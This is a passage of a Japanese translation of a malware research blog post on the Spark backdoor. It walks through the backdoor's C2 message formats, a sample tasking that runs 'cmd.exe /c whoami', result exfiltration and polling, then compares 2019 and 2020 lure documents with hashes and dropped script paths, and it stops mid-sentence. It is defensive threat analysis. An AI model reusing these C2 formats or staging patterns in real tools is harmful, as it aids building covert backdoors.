\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u4e88\u671f\u3055\u308c\u308bJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u306f\u3001\"Jordanlzw\"\u3068\u3044\u3046\u540d\u524d\u306e\u914d\u5217\u304c\u542b\u307e\u308c\u3066\u3044\u3066\u3001\u305d\u308c\u306b\u306f\u3001\"Ivory\"\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u30bf\u30b9\u30af\u8b58\u5225\u756a\u53f7\u3001\"Alanih\"\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u5b9f\u884c\u3059\u308b\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u540d\u3001\"TrumanRd\"\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u305d\u306e\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306b\u6e21\u3059\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u5f15\u6570\u304c\u6307\u5b9a\u3055\u308c\u308b1\u3064\u4ee5\u4e0a\u306e\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u4f8b\u3048\u3070\u3001\u56f39\u306e\u5fa9\u53f7\u3055\u308c\u305f\u5fdc\u7b54\u306b\u306f\u3001JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u542b\u307e\u308c\u3066\u304a\u308a\u3001\u3053\u308c\u304c\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u3001\"c:\\windows\\system32\\cmd.exe\"\u3092\u3001\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u5f15\u6570\"\/c whoami\"\u3092\u4f7f\u7528\u3057\u3066\u5b9f\u884c\u3059\u308b\u3088\u3046\u306b\u6307\u793a\u3057\u3001\u5b9f\u8cea\u7684\u306b\u306f\u3053\u308c\u306b\u3088\u3063\u3066\"whoami\"\u30b3\u30de\u30f3\u30c9\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">{\"Aryana\": 0, \"Jordanlzw\" :[{\"Ivory\" : 5, \"Jonas\" : true, \"Reginacy\" : false, \"TrumanRd\" : \"\/NKg0zJdCDP1XlK9NJ4eJA==\", \"Alanih\" : \"i8KOnxchf86h8NKfF45XMETHhwTx6yF3AfMoWzyG9wA=\", \"LondonzO\" : true}]}<\/span><\/p>\n<p>C2\u306b\u3088\u3063\u3066\u63d0\u4f9b\u3055\u308c\u308b\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u305f\u5f8c\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306fC2\u30b5\u30fc\u30d0\u30fc\u306b\u30e1\u30c3\u30bb\u30fc\u30b8\u3092\u9001\u4fe1\u3057\u307e\u3059\u3002\u3053\u306e\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u3001\u305d\u306e\u30b5\u30fc\u30d0\u30fc\u306b\u7279\u5b9a\u306e\u30bf\u30b9\u30af\u8b58\u5225\u5b50\u3092\u9001\u4fe1\u3059\u308b\u3053\u3068\u3067\u3001\u30b3\u30de\u30f3\u30c9\u3092\u53d7\u4fe1\u3057\u305f\u3053\u3068\u3092C2\u306b\u901a\u77e5\u3059\u308b\u76ee\u7684\u3092\u6301\u3064\u3068\u79c1\u305f\u3061\u306f\u8003\u3048\u3066\u3044\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u6b21\u306eJSON\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u901a\u4fe1\u30bf\u30a4\u30d7\"MorganE\"\u3092\u4f7f\u7528\u3057\u3066C2\u306b\u901a\u77e5\u3057\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">{\"CallieVK\":\"eyJKYXNlTiI6W3siTGF3cmVuY2UiOjV9XX0=\",\"ReeceWNM\":\"MorganE\"}<\/span><\/p>\n<p>\"CallieVK\"\u30d5\u30a3\u30fc\u30eb\u30c9\u5185\u306e\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30c7\u30fc\u30bf\u306b\u306f\u3001\"JaseN\"\u3068\u3044\u3046\u540d\u524d\u306eJSON\u914d\u5217\u304c\u542b\u307e\u308c\u3066\u304a\u308a\u3001\u3053\u308c\u306b\u306f\u3001\u53d7\u4fe1\u3057\u305f\u30bf\u30b9\u30af\u756a\u53f7\u304c\u542b\u307e\u308c\u305f\"Lawrence\"\u3068\u3044\u3046\u30d5\u30a3\u30fc\u30eb\u30c9\u540d\u3092\u6301\u30641\u3064\u4ee5\u4e0a\u306e\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u4f8b\u3048\u3070\u3001{\"JaseN\":[{\"Lawrence\":5}]}\u306e\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002\u3053\u306e\u80af\u5b9a\u5fdc\u7b54\u306f\u3001\u56f310\u306b\u793a\u3059\u3088\u3046\u306bC2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u307e\u3059\u3002<\/p>\n<p><span style=\"font-size: 10pt;\"><img width=\"1396\" height=\"324\"  class=\"wp-image-105243 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/03\/figure-10-payload-notifying-the-c2-server-that-it.png\" alt=\"Figure 10. Payload notifying the C2 server that it received the command\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f310. \u30b3\u30de\u30f3\u30c9\u3092\u53d7\u4fe1\u3057\u305f\u3053\u3068\u3092C2\u30b5\u30fc\u30d0\u30fc\u306b\u901a\u77e5\u3059\u308b\u30da\u30a4\u30ed\u30fc\u30c9<\/span><\/p>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30b3\u30de\u30f3\u30c9\u306e\u53d7\u4fe1\u3092\u80af\u5b9a\u5fdc\u7b54\u3057\u305f\u5f8c\u3001C2\u304c\u3001{\"Allier\" : 7}\u306a\u3069\u306e\u3088\u3046\u306b\u3001\"Allier\"\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u6570\u5b57\u304c\u8a2d\u5b9a\u3055\u308c\u305fJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u542b\u3080\u5fdc\u7b54\u3092\u3059\u308b\u3053\u3068\u3092\u671f\u5f85\u3057\u307e\u3059\u3002\u3053\u306e\u9001\u4fe1\u306e\u76ee\u7684\u3084\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u3067\u3053\u306e\u6570\u5024\u304c\u3069\u306e\u3088\u3046\u306b\u4f7f\u7528\u3055\u308c\u308b\u306e\u304b\u306f\u3088\u304f\u308f\u304b\u308a\u307e\u305b\u3093\u304c\u3001\u56f311\u306b\"Allier\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3092\u542b\u3080base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u3092\u793a\u3057\u307e\u3059\u3002<\/p>\n<p><span style=\"font-size: 10pt;\"><img width=\"670\" height=\"248\"  class=\"wp-image-105245 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/03\/figure-11-c2-server-providing-the-allier-json-obje.png\" alt=\"Figure 11 C2 server providing the Allier JSON object\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f311 Allier JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u63d0\u4f9b\u3059\u308bC2\u30b5\u30fc\u30d0\u30fc<\/span><\/p>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\"Allier\" JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u53d7\u4fe1\u3057\u305f\u5f8c\u3001\u5b9f\u884c\u3057\u305f\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u3092C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3057\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\"Zeke\"\u3068\u3044\u3046\u540d\u524d\u306e\u914d\u5217\u3092\u6301\u3064JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u3053\u306e\u914d\u5217\u306b\u306f\u3001\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3059\u308b\"FrederickT\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3001\u30bf\u30b9\u30af\u8b58\u5225\u5b50\u3092\u793a\u3059\"ReesefP\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3001\u30b3\u30de\u30f3\u30c9\u304c\u6210\u529f\u3057\u305f\u5834\u5408\u306e\u30d6\u30fc\u30eb\u5024\u3092\u683c\u7d0d\u3059\u308b\"KaileeXws\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3092\u6301\u3064JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u7d50\u679c\u306eJSON\u306f\u3001C2\u306b\u3088\u3063\u3066\u767a\u884c\u3055\u308c\u305f'whoami'\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u304c\"test-system\\&lt;redacted&gt;\"\u3067\u3042\u308b\u5834\u5408\u306f\u3001\u6b21\u306e\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">{\"Zeke\":[{\"FrederickT\":\"5yUu16Ae8WKt&lt;redacted&gt;\",\"KaileeXws\":true,\"ReesefP\":5}]}<\/span><\/p>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u3053\u306e\u30c7\u30fc\u30bf\u3092base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3057\u3001\u6b21\u306e\u3088\u3046\u306b\u30a2\u30a6\u30c8\u30d0\u30f3\u30c9JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u5185\u306e\"CallieVK\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3092\u8a2d\u5b9a\u3057\u3001\"ReeceWNM\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3092\"Winston\"\u901a\u4fe1\u30bf\u30a4\u30d7\u306b\u8a2d\u5b9a\u3057\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">{\"CallieVK\":\"eyJaZWtlIjpbeyJGcmVkZXJpY2tUIjoiNXlVdTE2QWU4V0t0aX&lt;redacted&gt;0iLCJLYWlsZWVYd3MiOnRydWUsIlJlZXNlZlAiOjV9XX0=\",\"ReeceWNM\":\"Winston\"}<\/span><\/p>\n<p>\u6b21\u306b\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u3053\u306eJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u6697\u53f7\u5316\u3057\u3066C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3057\u3001\u3053\u306e\u767a\u884c\u3057\u305f\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u3092\u76d7\u307f\u51fa\u3057\u307e\u3059\u3002\u56f312\u306f\u3001\"Winston\"\u901a\u4fe1\u30bf\u30a4\u30d7\u3092\u542b\u3080\u6697\u53f7\u5316\u3055\u308c\u305fJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u542b\u307e\u308c\u305fHTTP POST\u8981\u6c42\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><span style=\"font-size: 10pt;\"><img width=\"1302\" height=\"396\"  class=\"wp-image-105247 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/03\/figure-12-payload-sending-the-results-of-the-issu.png\" alt=\"Figure 12. Payload sending the results of the issued command to the C2 server\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f312. \u767a\u884c\u3057\u305f\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u3092C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3059\u308b\u30da\u30a4\u30ed\u30fc\u30c9<\/span><\/p>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u6700\u521d\u306e\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u3092\u9001\u4fe1\u3057\u305f\u5f8c\u3001C2\u304c\u3001\"{\"Garrison\" : 8}\"\u306a\u3069\u3001\"Garrison\"\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u6570\u5024\u3092\u8a2d\u5b9a\u3057\u305fJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3067\u5fdc\u7b54\u3059\u308b\u3053\u3068\u3092\u671f\u5f85\u3057\u307e\u3059\u3002\u56f313\u306f\u3001C2\u30b5\u30fc\u30d0\u30fc\u306e\u3001\"Garrison\"\u30d5\u30a3\u30fc\u30eb\u30c9\u304c\u542b\u307e\u308c\u305fJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306e\u6697\u53f7\u5316\u30c6\u30ad\u30b9\u30c8\u3067\u306e\u5fdc\u7b54\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><span style=\"font-size: 10pt;\"><img width=\"718\" height=\"238\"  class=\"wp-image-105249 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/03\/figure-13-c2-server-sending-the-garrison-json-obj.png\" alt=\"Figure 13. C2 server sending the Garrison JSON object to the payload\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f313. Garrison JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u9001\u4fe1\u3059\u308bC2\u30b5\u30fc\u30d0\u30fc<\/span><\/p>\n<p>\u3053\u308c\u306f\u3001C2\u306e\u30c1\u30a7\u30c3\u30af\u30a4\u30f3\u304a\u3088\u3073\u6700\u521d\u306e\u30b3\u30de\u30f3\u30c9\u5b9f\u884c\u90e8\u5206\u3092\u7d42\u7d50\u3055\u305b\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u7d99\u7d9a\u7684\u306bHTTP\u8981\u6c42\u3092\u9001\u4fe1\u3059\u308b\u30eb\u30fc\u30d7\u306b\u5165\u308a\u307e\u3059\u3002\u3053\u306e\u8981\u6c42\u306f\u3001\u4ee5\u524d\u8aac\u660e\u3057\u305fJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306e\u540c\u3058\u30b7\u30fc\u30b1\u30f3\u30b9\u3092\u4f7f\u7528\u3057\u3066\u5b9f\u884c\u3059\u308b\u8ffd\u52a0\u306e\u30b3\u30de\u30f3\u30c9\u3092\u53d6\u5f97\u3059\u308b\u305f\u3081\u306e\u3082\u306e\u3067\u3059\u3002\u3053\u308c\u306f\u3001C2\u306b\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u9001\u4fe1\u3057\u305f\"JoslynKe\"\u901a\u4fe1\u30bf\u30a4\u30d7\u306e\u5f8c\u304b\u3089\u59cb\u307e\u308a\u307e\u3059\u3002C2\u306b\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u9001\u4fe1\u3057\u3066\u305d\u306e\u5fdc\u7b54\u3092\u89e3\u6790\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u53d6\u5f97\u3059\u308b\u4ee3\u308f\u308a\u306b\u3001\u3053\u306e\u30eb\u30fc\u30d7\u306e\u5404\u7e70\u308a\u8fd4\u3057\u306f\u3001\u3053\u3053\u3067\u793a\u3055\u308c\u305f\"VanessaFM\"\u306e\u901a\u4fe1\u30bf\u30a4\u30d7\u3067\u59cb\u307e\u308a\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">{\"CallieVK\":\"eyJBZGVsaW5lUkQiOiJ2Y0picTZuemdKaz0iLCJBdmVyaXp0IjoiMSIsIkJyYW5kZW50bEsiOjEsIk1hdGhpYXNOYm8iOlt7IkFkYWx5bm5nUyI6MSwiQ29sbGluc1BNIjoiS1Q2TloyMVNGTVQ5WHFuZVM3MjJmZkVucG1FUFVZcDBqcDFFTXRaVEtyUmNNWkVFWG56QnZnPT0iLCJOZXZhZWgiOnRydWV9XX0=\",\"ReeceWNM\":\"VanessaFM\"}<\/span><\/p>\n<p>\"CallieVK\"\u30d5\u30a3\u30fc\u30eb\u30c9\u306e\u30c7\u30fc\u30bf\u306f\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u3066\u3001\u3044\u304f\u3064\u304b\u306e\u30d5\u30a3\u30fc\u30eb\u30c9\u3092\u6301\u3064JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u306a\u308a\u307e\u3059\u3002\u305d\u306e1\u3064\u306f\u3001\"MathiasNbo\"\u3068\u547c\u3070\u308c\u308b\u914d\u5217\u3067\u3042\u308a\u3001\u305d\u308c\u306b\u306f\u3001\u4fb5\u5bb3\u3055\u308c\u305f\u30b7\u30b9\u30c6\u30e0\u306eUUID\u3092\u9001\u4fe1\u3059\u308bJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u3001\"CollinsPM\"\u3068\u3044\u3046\u540d\u524d\u306e\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30d5\u30a3\u30fc\u30eb\u30c9\u306f\u3001\u524d\u306b\"JoslynKe\"\u901a\u4fe1\u30bf\u30a4\u30d7\u306e\"ZaydenlnL\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3067C2\u306b\u9001\u4fe1\u3055\u308c\u305f\u3082\u306e\u3067\u3059\u3002\u3053\u306eJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u306f\u3001\u30cb\u30c3\u30af\u30cd\u30fc\u30e0\u307e\u305f\u306f\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u8b58\u5225\u5b50\u5024\u304cbase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u306e\u5f62\u5f0f\u3067\u542b\u307e\u308c\u305f\"AdelineRD\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3082\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u79c1\u305f\u3061\u306f\u3001\u65e2\u77e5\u306eSpark\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3 \u30b3\u30fc\u30c9\u306e\u30ea\u30b9\u30c8\u3092\u307e\u3068\u3081\u3001\u4ed8\u9332\u306b\u8a18\u8f09\u3057\u307e\u3057\u305f\u3002\u7d50\u679c\u306eJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u3082\u306e\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">{\"AdelineRD\":\"vcJbq6nzgJk=\",\"Averizt\":\"1\u2033,\"BrandentlK\":1,\"MathiasNbo\":[{\"AdalynngS\":1,\"CollinsPM\":\"\"&lt;base64 encoded ciphertext of UUID seen in ZaydenlnL field&gt;\",\"Nevaeh\":true}]}<\/span><\/p>\n<p>\u3053\u306eJSON\u306f\u3001\u56f314\u306e\u3088\u3046\u306b\u6697\u53f7\u5316\u3055\u308c\u3066base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u3001C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30e1\u30a4\u30f3 \u30eb\u30fc\u30d7\u306e\u7e70\u308a\u8fd4\u3057\u3054\u3068\u306b\u540c\u3058JSON\u3092\u4f7f\u7528\u3057\u3001C2\u304b\u3089\u3001\"Jordanlzw\"\u3001\"Allier\"\u3001\u304a\u3088\u3073\"Garrison\"\u306e\u5404\u30d5\u30a3\u30fc\u30eb\u30c9\u304c\u542b\u307e\u308c\u305f\u524d\u8ff0\u3068\u540c\u3058\u30b7\u30fc\u30b1\u30f3\u30b9\u306e\u5fdc\u7b54\u304c\u63d0\u4f9b\u3055\u308c\u3001\u8ffd\u52a0\u306e\u30b3\u30de\u30f3\u30c9\u3092\u53d7\u4fe1\u3059\u308b\u3053\u3068\u3092\u671f\u5f85\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><span style=\"font-size: 10pt;\"><img width=\"1510\" height=\"462\"  class=\"wp-image-105251 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/03\/figure-14-payload-issuing-http-post-to-c2-server.png\" alt=\"Figure 14. Payload issuing HTTP POST to C2 server requesting further commands\" \/><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f314. \u8ffd\u52a0\u306e\u30b3\u30de\u30f3\u30c9\u3092\u8981\u6c42\u3059\u308bHTTP POST\u3092C2\u30b5\u30fc\u30d0\u30fc\u306b\u767a\u884c\u3059\u308b\u30da\u30a4\u30ed\u30fc\u30c9<\/span><\/p>\n<h2><a id=\"post-105222-X43808fbf0f2ba9669183fded036abf760a2f81f\"><\/a>2019\u5e74\u30682020\u5e74\u3068\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u6bd4\u8f03<\/h2>\n<p>\u8ffd\u52a0\u306eSpark\u30b5\u30f3\u30d7\u30eb\u3092\u53ce\u96c6\u3057\u306a\u304c\u3089\u3001\u79c1\u305f\u3061\u306f\u3001<a href=\"https:\/\/ti.360.net\/blog\/articles\/suspected-molerats-new-attack-in-the-middle-east-en\/\">2019\u5e74\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3<\/a>\u306e\u30b5\u30f3\u30d7\u30eb\u3068<a href=\"https:\/\/www.cybereason.com\/blog\/new-cyber-espionage-campaigns-targeting-palestinians-part-one\">Spark\u30ad\u30e3\u30f3\u30da\u30fc\u30f3<\/a>\u3067\u4f7f\u7528\u3055\u308c\u305f2020\u5e741\u6708\u306b\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305f\u65b0\u3057\u3044\u30b5\u30f3\u30d7\u30eb\u3092\u898b\u3064\u3051\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306b\u4f7f\u7528\u3055\u308c\u305f\u914d\u4fe1\u6587\u66f8\u3068Spark\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u30012019\u5e74\u306e10\u6708\u306811\u6708\u306e\u653b\u6483\u3067\u89b3\u6e2c\u3055\u308c\u305f\u914d\u4fe1\u6587\u66f8\u3068\u306f\u7570\u306a\u308a\u307e\u3059\u3002\u5927\u307e\u304b\u306b\u8a00\u3048\u3070\u30012019\u5e741\u6708\u306e\u914d\u4fe1\u6587\u66f8\u306f\u5185\u90e8\u306b\u305d\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u57cb\u3081\u8fbc\u307e\u308c\u3066\u3044\u308b\u81ea\u5df1\u5145\u8db3\u578b\u3067\u3057\u305f\u304c\u30012019\u5e74\u306e10\u6708\u306811\u6708\u304a\u3088\u30732020\u5e741\u6708\u306e\u914d\u4fe1\u6587\u66f8\u306f\u3001\u30ea\u30e2\u30fc\u30c8 \u30b5\u30fc\u30d0\u30fc\u3068\u306e\u5bfe\u8a71\u3092\u5fc5\u8981\u3068\u3057\u3066\u3044\u307e\u3057\u305f\u30022019\u5e7410\u6708\u306e\u6587\u66f8\u30682020\u5e741\u6708\u306e\u6587\u66f8\u306e\u76f8\u9055\u306f\u3001\u524d\u8005\u306f\u653b\u6483\u8005\u304c\u5236\u5fa1\u3059\u308b\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308bVBScript\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u8a66\u307f\u308b\u306e\u306b\u5bfe\u3057\u3066\u30012020\u5e741\u6708\u306e\u6587\u66f8\u306fGoogle\u30c9\u30e9\u30a4\u30d6\u304b\u3089\u30ea\u30e2\u30fc\u30c8 \u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092\u30ed\u30fc\u30c9\u3057\u3066\u3001\u305d\u306e\u30de\u30af\u30ed\u304cGoogle\u30c9\u30e9\u30a4\u30d6\u304b\u3089\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u8a66\u307f\u308b\u3068\u3044\u3046\u70b9\u3067\u3059\u3002\u3053\u308c\u3089\u306e\u914d\u4fe1\u6587\u66f8\u305d\u308c\u305e\u308c\u306b\u3088\u3063\u3066\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u308b\u65e2\u77e5\u306eSpark\u30da\u30a4\u30ed\u30fc\u30c9\u3082\u7570\u306a\u3063\u3066\u304a\u308a\u3001\u79c1\u305f\u3061\u306f\u3053\u308c\u3092\u3053\u306e\u30d6\u30ed\u30b0\u3067\u524d\u8ff0\u3057\u305f11\u6708\u306e\u653b\u6483\u3067\u306e\u65e2\u77e5\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u6bd4\u8f03\u3057\u307e\u3059\u3002<\/p>\n<p>2019\u5e74\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u914d\u4fe1\u6587\u66f8\u3092\u89e3\u6790\u3057\u305f\u3068\u3053\u308d\u3001\u305d\u308c\u306f\u30de\u30af\u30ed\u3092\u6709\u52b9\u5316\u3057\u305fWord\u6587\u66f8(SHA256:40b7a1e8c00deb6d26f28bbdd3e9abe0a483873a4a530742bb65faace89ffd11)\u3067\u3042\u3063\u305f\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u3053\u306e\u30de\u30af\u30ed\u306f\u3001\"Shapes(\"textbox1\").Visible = True\"\u3068\u3044\u3046\u884c\u3067\u6587\u66f8\u5185\u306e\u30c6\u30ad\u30b9\u30c8\u30dc\u30c3\u30af\u30b9\u3092\u53ef\u8996\u306b\u8a2d\u5b9a\u3059\u308b\u3053\u3068\u3067\u3001\u304a\u3068\u308a\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u4f5c\u6210\u3057\u307e\u3057\u305f\u304c\u3001\u3053\u306e\u30d6\u30ed\u30b0\u3067\u524d\u8ff0\u3057\u305f\u653b\u6483\u3067\u306f\u66f4\u65b0\u3055\u308c\u305f\u304a\u3068\u308a\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u8868\u793a\u3059\u308b\u8a66\u307f\u306f\u3042\u308a\u307e\u305b\u3093\u3067\u3057\u305f\u3002\u3082\u30461\u3064\u306e\u8457\u3057\u3044\u9055\u3044\u306f\u30012019\u5e74\u306e1\u6708\u306810\u6708\u306e\u914d\u4fe1\u6587\u66f8\u306f\u3069\u3061\u3089\u3082\u3001\u305d\u308c\u305e\u308c2\u756a\u76ee\u306eVBScript %userprofile%\\wmsetup.vbs\u3068programdata\\Micorsoft\\Microsoft.vbs\u306b\u66f8\u304d\u8fbc\u307f\u307e\u3057\u305f\u304c\u3001wmsetup.vbs\u30b9\u30af\u30ea\u30d7\u30c8\u306b\u306f\u30d0\u30a4\u30ca\u30ea \u30da\u30a4\u30ed\u30fc\u30c9\u304c\u542b\u307e\u308c\u308b\u306e\u306b\u5bfe\u3057\u3001Microsoft.vbs\u306f\u30d0\u30a4\u30ca\u30ea \u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u3082\u30461\u3064\u306eVBScript\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u8a66\u307f\u308b\u3053\u3068\u3067\u3059\u3002wmsetup.vbs\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u3001\u57cb\u3081\u8fbc\u307e\u308c\u305fbase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9(SHA256:9511940ed52775aef969fba004678f4c142b33e2dd631a0e8f4e536ab0b811db<\/p>\n<p>)\u3092\u30c7\u30b3\u30fc\u30c9\u3057\u3001\u305d\u308c\u3092%temp%\\ihelp.exe\u306b\u4fdd\u5b58\u3057\u3001\u4ee5\u4e0b\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3053\u3068\u3067\u3001\u6c38\u7d9a\u5316\u3059\u308b\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af\u3092\u4f5